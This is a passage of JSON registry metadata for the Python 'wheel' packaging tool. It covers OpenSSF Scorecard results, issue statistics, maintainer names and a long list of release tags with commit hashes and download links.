.github/workflows/publish.yml:48","Warn: no topLevel permission defined: .github/workflows/publish.yml:1","Warn: no topLevel permission defined: .github/workflows/test.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.txt:0","Info: FSF or OSI recognized license: MIT License: LICENSE.txt:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/publish.yml:31"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Security-Policy","score":0,"reason":"security policy file not detected","details":["Warn: no security policy file detected","Warn: no security file to analyze","Warn: no security file to analyze","Warn: no security file to analyze"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":5,"reason":"SAST tool is not run on all commits -- score normalized to 5","details":["Warn: 6 commits out of 12 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-22T20:33:25.724Z","repository_id":23174547,"created_at":"2025-08-22T20:33:25.724Z","updated_at":"2025-08-22T20:33:25.724Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29350077,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-02-11T20:11:40.865Z","status":"ssl_error","status_checked_at":"2026-02-11T20:10:41.637Z","response_time":97,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"repo_metadata_updated_at":"2026-02-13T01:59:22.657Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":0.5252042460957039,"forks_count":0.36958817317845827,"docker_downloads_count":null,"average":0.22369810481854055},"purl":"pkg:deb/ubuntu/wheel?arch=source\u0026distro=ubuntu-24.04","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/ubuntu/wheel","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/ubuntu/wheel","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/ubuntu/wheel/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-02-13T00:01:56.425Z","issues_count":110,"pull_requests_count":187,"avg_time_to_close_issue":48693272.43877551,"avg_time_to_close_pull_request":2624958.380116959,"issues_closed_count":98,"pull_requests_closed_count":171,"pull_request_authors_count":38,"issue_authors_count":91,"avg_comments_per_issue":5.872727272727273,"avg_comments_per_pull_request":3.5828877005347595,"merged_pull_requests_count":145,"bot_issues_count":0,"bot_pull_requests_count":65,"past_year_issues_count":11,"past_year_pull_requests_count":24,"past_year_avg_time_to_close_issue":215250.42857142858,"past_year_avg_time_to_close_pull_request":1111066.1,"past_year_issues_closed_count":7,"past_year_pull_requests_closed_count":20,"past_year_pull_request_authors_count":9,"past_year_issue_authors_count":10,"past_year_avg_comments_per_issue":5.0,"past_year_avg_comments_per_pull_request":3.5416666666666665,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":4,"past_year_merged_pull_requests_count":16,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/issues","maintainers":[{"login":"jaraco","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"},{"login":"woodruffw","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/woodruffw"},{"login":"di","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/di"},{"login":"uranusjr","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/uranusjr"},{"login":"pradyunsg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pradyunsg"},{"login":"mayeut","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mayeut"},{"login":"alex","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alex"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.04/packages/wheel/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.04/packages/wheel/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.04/packages/wheel/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.04/packages/wheel/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.04/packages/wheel/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.04/packages/wheel/codemeta","maintainers":[],"registry":{"name":"ubuntu-24.04","url":"https://launchpad.net/ubuntu/noble","ecosystem":"ubuntu","default":true,"packages_count":37306,"maintainers_count":0,"namespaces_count":4,"keywords_count":1701,"github":"ubuntu","metadata":{"codename":"noble","funded_packages_count":198},"icon_url":"https://github.com/ubuntu.png","created_at":"2026-02-04T11:01:45.928Z","updated_at":"2026-06-10T05:17:44.581Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.04/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.04/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.04/namespaces"}},{"id":2970006,"name":"wheel","ecosystem":"pypi","description":"Command line tool for manipulating wheel files","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/pypa/wheel","keywords_array":["wheel","packaging"],"namespace":null,"versions_count":83,"first_release_published_at":"2012-07-01T07:33:22.000Z","latest_release_published_at":"2026-04-22T15:51:26.000Z","latest_release_number":"0.47.0","last_synced_at":"2026-06-20T10:01:00.778Z","created_at":"2022-04-10T13:04:15.141Z","updated_at":"2026-06-20T21:16:13.185Z","registry_url":"https://pypi.org/project/wheel/","install_command":"pip install wheel --index-url https://pypi.org/simple","documentation_url":"https://wheel.readthedocs.io/","metadata":{"funding":null,"documentation":"https://wheel.readthedocs.io/","classifiers":["Development Status :: 5 - Production/Stable","Intended Audience :: Developers","Programming Language :: Python","Programming Language :: Python :: 3 :: Only","Programming Language :: Python :: 3.10","Programming Language :: Python :: 3.11","Programming Language :: Python :: 3.12","Programming Language :: Python :: 3.13","Programming Language :: Python :: 3.14","Programming Language :: Python :: 3.9","Topic :: System :: Archiving :: Packaging"],"normalized_name":"wheel","project_status":null},"repo_metadata":{"id":23174547,"uuid":"98346885","full_name":"pypa/wheel","owner":"pypa","description":"The official binary distribution format for Python","archived":false,"fork":false,"pushed_at":"2024-05-01T09:06:13.000Z","size":1831,"stargazers_count":475,"open_issues_count":48,"forks_count":143,"subscribers_count":33,"default_branch":"main","last_synced_at":"2024-05-01T11:29:10.995Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/pypa.png","metadata":{"files":{"readme":"README.rst","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2017-07-25T20:24:25.000Z","updated_at":"2024-08-04T16:00:28.567Z","dependencies_parsed_at":"2024-02-03T11:27:24.404Z","dependency_job_id":"c444d7cc-5eb9-412d-b647-9474b7b4096f","html_url":"https://github.com/pypa/wheel","commit_stats":{"total_commits":815,"total_committers":70,"mean_commits":"11.642857142857142","dds":0.6269938650306748,"last_synced_commit":"95b7bc9a9b110f7dddbd95c068877f081c3998bf"},"previous_names":[],"tags_count":64,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":215693818,"owners_count":15917214,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"pypa","name":"Python Packaging Authority","uuid":"647025","kind":"organization","description":"","email":"info@pypa.io","website":"https://www.pypa.io","location":"United States of America","twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/647025?v=4","repositories_count":54,"last_synced_at":"2024-05-20T15:05:54.402Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/pypa","funding_links":["https://github.com/sponsors/pypa"],"total_stars":79283,"followers":1384,"following":0,"created_at":"2022-11-02T16:21:37.826Z","updated_at":"2024-05-20T15:05:56.749Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa/repositories"},"tags":[{"name":"0.44.0","sha":"7bb46d7727e6e89fe56b3c78297b3af2672bbbe2","kind":"commit","published_at":"2024-08-04T14:48:22.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.44.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.44.0/manifests"},{"name":"0.43.0","sha":"fa33dfd01fd665c1fd90097563b34bce4b5527ef","kind":"commit","published_at":"2024-03-11T19:28:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.43.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.43.0/manifests"},{"name":"0.42.0","sha":"63a09bb3d92630c1d35f4fcc6f79250256aeeb5c","kind":"commit","published_at":"2023-11-26T14:35:45.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.42.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.42.0/manifests"},{"name":"0.41.3","sha":"a899f1c69ffddf564b904a5de974457c213dc36a","kind":"commit","published_at":"2023-10-30T10:04:00.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.3/manifests"},{"name":"0.41.2","sha":"e76040b0d970a0fe6211c31888fc929078ba02d9","kind":"commit","published_at":"2023-08-22T09:29:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.2/manifests"},{"name":"0.41.1","sha":"b626a4a2ee6a887c7ad4b984fcb4d465dbfa337d","kind":"commit","published_at":"2023-08-05T13:31:27.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.1/manifests"},{"name":"0.41.0","sha":"95c2d83cde174ed3c34d5a5b53dc3b3a1ace91b6","kind":"commit","published_at":"2023-07-22T10:59:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.0/manifests"},{"name":"0.40.0","sha":"461f7a3a2d4824009ca4855b3300d61e6d405dc4","kind":"commit","published_at":"2023-03-14T14:38:44.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.40.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.40.0/manifests"},{"name":"0.38.4","sha":"814c2efe8e40051039c5a6de6945e04ecdd162ee","kind":"commit","published_at":"2022-11-09T20:33:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.4/manifests"},{"name":"0.38.3","sha":"daeb157c8207b1459fc7baa5f234c165a7a5faf4","kind":"commit","published_at":"2022-11-08T17:46:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.3/manifests"},{"name":"0.38.2","sha":"44193907eb308930de05deed863fb4d157c5c866","kind":"commit","published_at":"2022-11-05T12:52:57.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.2/manifests"},{"name":"0.38.1","sha":"6f1608dc1a88f00d2390b9044bd655753f39234c","kind":"commit","published_at":"2022-11-04T09:09:25.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.1/manifests"},{"name":"0.38.0","sha":"fcb94cd51f7dfd40d88dff37415750d9e3638d3b","kind":"commit","published_at":"2022-10-20T21:19:31.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.0/manifests"},{"name":"0.37.1","sha":"c716c87ffa528ac9a31de3ed3217058848dc2cd2","kind":"commit","published_at":"2021-12-22T12:19:07.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.37.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.1/manifests"},{"name":"0.37.0","sha":"b8c4aa055cea0132776e7e53edce3538710d5b68","kind":"commit","published_at":"2021-08-09T20:44:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.37.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.0/manifests"},{"name":"0.36.2","sha":"4fb47f98550f3f43fc0b8c73f518592124ae21bd","kind":"commit","published_at":"2020-12-13T18:07:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.2/manifests"},{"name":"0.36.1","sha":"64550e15fdbc96d5690dc872257edc859c218068","kind":"commit","published_at":"2020-12-04T14:00:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.1/manifests"},{"name":"0.36.0","sha":"39b6397ba944d82f1fe37d043382f97b78a919d6","kind":"commit","published_at":"2020-12-01T08:52:46.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.0/manifests"},{"name":"0.35.1","sha":"bbc60829bea2eb25ccd236b9c6c16c9ee4f0d2ef","kind":"commit","published_at":"2020-08-14T19:22:54.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.35.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.1/manifests"},{"name":"0.35.0","sha":"4253bbb865823101d1a1757d12239fc74f49c4e7","kind":"commit","published_at":"2020-08-13T21:08:53.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.35.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.0/manifests"},{"name":"0.34.2","sha":"0036f80513457a95a309c81d8a63f113b52dbafa","kind":"commit","published_at":"2020-01-30T22:20:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.2/manifests"},{"name":"0.34.1","sha":"43078c409ebe9b7d5d70c2476fcb82055e8f0b97","kind":"tag","published_at":"2020-01-27T20:20:14.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.1/manifests"},{"name":"0.34.0","sha":"8b2312799f46359ac78f3b011dc758c45518e9e1","kind":"commit","published_at":"2020-01-27T08:21:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.0/manifests"},{"name":"0.33.6","sha":"b227ddd5beaba49294017d061d501f6d433393b0","kind":"commit","published_at":"2019-08-18T09:55:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.6/manifests"},{"name":"0.33.5","sha":"9ee9726620f80232ca49991dbeef83963d94482a","kind":"commit","published_at":"2019-08-17T16:13:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.5","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.5/manifests"},{"name":"0.33.4","sha":"882cd05d9bf4c4fc72568d806e227b5cf14df1d7","kind":"commit","published_at":"2019-05-11T21:41:35.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.4/manifests"},{"name":"0.33.3","sha":"7b782219d5322ee66cef293c5c5b49fbd4133a0d","kind":"commit","published_at":"2019-05-10T11:06:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.3/manifests"},{"name":"0.33.2","sha":"9534258081b4abf3af817dab976bc95ecc4bfa30","kind":"commit","published_at":"2019-05-09T08:18:30.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.2/manifests"},{"name":"0.33.1","sha":"c15924d80ed2235f277569d99bb9d80f59c9b19d","kind":"commit","published_at":"2019-02-19T14:03:57.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.1/manifests"},{"name":"0.33.0","sha":"bb54233a2dc855951fa40a48d5730c67f9d570c8","kind":"commit","published_at":"2019-02-12T06:58:33.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.0/manifests"},{"name":"0.32.3","sha":"11584b78a56b4eedba4eedc55c9dac8aa2dd7070","kind":"commit","published_at":"2018-11-19T00:16:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.3/manifests"},{"name":"0.32.2","sha":"3d3708c659f7b9988f958539e7748a1a01ee6e77","kind":"commit","published_at":"2018-10-20T20:03:14.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.2","dependencies_parsed